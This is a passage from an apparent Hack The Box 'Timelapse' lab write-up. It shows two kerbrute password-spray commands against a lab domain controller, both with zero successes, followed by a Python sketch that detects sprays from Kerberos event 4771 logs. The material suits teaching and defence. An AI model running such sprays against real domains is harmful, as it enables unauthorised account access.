Password Spraying Attack


Leveraging the [[Timelapse_RID_Cycling#[RID Cycling](https //www.trustedsec.com/blog/new-tool-release-rpc_enum-rid-cycling-attack/)|domain users]] discovered through the RID Cycling attack, together with the cracked archive password and the PFX password, I can attempt a password spraying attack to check for password reuse.

┌──(kali㉿kali)-[~/archive/htb/labs/timelapse]
└─$ kerbrute passwordspray --dc dc01.timelapse.htb -d TIMELAPSE.HTB ./users.txt 'supremelegacy'
 
    __             __               __     
   / /_____  _____/ /_  _______  __/ /____ 
  / //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
 / ,< /  __/ /  / /_/ / /  / /_/ / /_/  __/
/_/|_|\___/_/  /_.___/_/   \__,_/\__/\___/                                        
 
version: v1.0.3 (9dad6e1) - 10/24/23 - Ronnie Flathers @ropnop
 
2023/10/24 20:51:40 >  Using KDC(s):
2023/10/24 20:51:40 >  	dc01.timelapse.htb:88
 
2023/10/24 20:51:41 >  Done! Tested 13 logins (0 successes) in 0.906 seconds
 
┌──(kali㉿kali)-[~/archive/htb/labs/timelapse]
└─$ kerbrute passwordspray --dc dc01.timelapse.htb -d TIMELAPSE.HTB ./users.txt 'thuglegacy'
 
    __             __               __     
   / /_____  _____/ /_  _______  __/ /____ 
  / //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
 / ,< /  __/ /  / /_/ / /  / /_/ / /_/  __/
/_/|_|\___/_/  /_.___/_/   \__,_/\__/\___/                                        
 
version: v1.0.3 (9dad6e1) - 10/24/23 - Ronnie Flathers @ropnop
 
2023/10/24 20:51:49 >  Using KDC(s):
2023/10/24 20:51:49 >  	dc01.timelapse.htb:88
 
2023/10/24 20:51:50 >  Done! Tested 13 logins (0 successes) in 0.994 seconds

Both supremelegacy and thuglegacy failed to authenticate for all 13 known domain users.
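
From the domain controller's side, a spray like the two runs above (13 AS-REQs against port 88 in under a second) appears as a burst of Event ID 4771 (Kerberos pre-authentication failed, status 0x18) from one client against many accounts, when Kerberos auditing is enabled. The following is an added detection sketch, not part of the original notes. It assumes the events are already parsed into dicts keyed by the 4771 field names, and the sample accounts and addresses are constructed.

```python
from collections import defaultdict
from datetime import datetime, timedelta

PREAUTH_FAILED = "0x18"  # KDC_ERR_PREAUTH_FAILED: valid account, wrong password


def detect_spray(events, window=timedelta(seconds=60), min_users=10):
    """Return {client_ip: peak number of distinct accounts failing pre-auth
    inside one sliding window} for clients that reach min_users."""
    by_client = defaultdict(list)
    for ev in events:
        if ev["EventID"] == 4771 and ev["Status"] == PREAUTH_FAILED:
            by_client[ev["IpAddress"]].append(
                (ev["time"], ev["TargetUserName"].lower()))
    hits = {}
    for client, fails in by_client.items():
        fails.sort()
        start, best = 0, 0
        for end in range(len(fails)):
            # Shrink the window until it spans at most `window` of time.
            while fails[end][0] - fails[start][0] > window:
                start += 1
            best = max(best, len({user for _, user in fails[start:end + 1]}))
        if best >= min_users:
            hits[client] = best
    return hits


def sample_events():
    """Constructed sample data (hypothetical accounts and addresses)."""
    t0 = datetime(2023, 10, 24, 20, 51, 40)
    # One client, 13 different accounts, one failure each, 70 ms apart.
    spray = [{"time": t0 + timedelta(milliseconds=70 * i), "EventID": 4771,
              "Status": PREAUTH_FAILED, "TargetUserName": f"user{i:02d}",
              "IpAddress": "10.0.0.50"} for i in range(13)]
    # A user mistyping their own password: several failures, one account.
    typo = [{"time": t0 + timedelta(seconds=20 * i), "EventID": 4771,
             "Status": PREAUTH_FAILED, "TargetUserName": "user03",
             "IpAddress": "10.0.0.77"} for i in range(3)]
    # A successful TGT request (4768, status 0x0) must be ignored.
    ok = [{"time": t0, "EventID": 4768, "Status": "0x0",
           "TargetUserName": "user05", "IpAddress": "10.0.0.77"}]
    return spray + typo + ok


if __name__ == "__main__":
    for ip, count in detect_spray(sample_events()).items():
        print(f"possible password spray from {ip}: {count} accounts")
```

Counting distinct accounts per client, rather than raw failures, is what separates a spray from a single user retrying a mistyped password.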